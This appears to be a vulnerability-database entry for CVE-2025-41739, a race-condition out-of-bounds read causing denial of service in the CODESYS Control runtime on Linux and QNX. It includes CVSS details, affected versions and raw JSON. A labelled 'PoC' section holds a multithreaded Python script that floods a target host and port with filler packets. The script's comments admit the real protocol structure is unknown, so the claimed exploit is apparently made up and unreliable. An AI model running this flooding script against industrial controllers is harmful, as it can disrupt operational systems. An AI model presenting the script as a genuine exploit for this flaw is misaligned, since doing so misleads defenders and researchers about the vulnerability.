Security Vulnerability Report
中文
CVE-2025-41739 CVSS 5.9 MEDIUM

CVE-2025-41739

Published: 2025-12-01 10:16:01
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An unauthenticated remote attacker, who beats a race condition, can exploit a flaw in the communication servers of the CODESYS Control runtime system on Linux and QNX to trigger an out-of-bounds read via crafted socket communication, potentially causing a denial of service.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

CODESYS Control for Linux < V4.11.0
CODESYS Control for QNX < V4.11.0
CODESYS Control Runtime System (Linux) versions prior to patch
CODESYS Control Runtime System (QNX) versions prior to patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-41739 PoC - CODESYS Control Race Condition DoS This PoC demonstrates sending malformed socket packets to trigger the race condition vulnerability in CODESYS Control communication servers. Note: This is for educational and authorized testing purposes only. """ import socket import struct import time import threading import sys def send_malformed_packet(target_ip, target_port, packet_count=100): """ Send crafted packets to trigger race condition The actual packet structure depends on CODESYS protocol analysis """ try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Crafted packet to trigger out-of-bounds read # Based on CVE description: malformed socket communication for i in range(packet_count): # Malformed CODESYS protocol packet payload = b'\x00' * 100 + bytes([i % 256]) * 50 s.send(payload) time.sleep(0.001) # Rapid sending to trigger race condition s.close() return True except Exception as e: return False def exploit_race_condition(target_ip, target_port, threads=10): """ Launch concurrent connections to maximize race condition window """ print(f"[*] Starting race condition attack on {target_ip}:{target_port}") threads_list = [] for i in range(threads): t = threading.Thread( target=send_malformed_packet, args=(target_ip, target_port, 50) ) threads_list.append(t) t.start() for t in threads_list: t.join() print("[*] Attack completed") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_ip> <port>") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) exploit_race_condition(target_ip, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41739", "sourceIdentifier": "[email protected]", "published": "2025-12-01T10:16:01.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker, who beats a race condition, can exploit a flaw in the communication servers of the CODESYS Control runtime system on Linux and QNX to trigger an out-of-bounds read via crafted socket communication, potentially causing a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-099", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.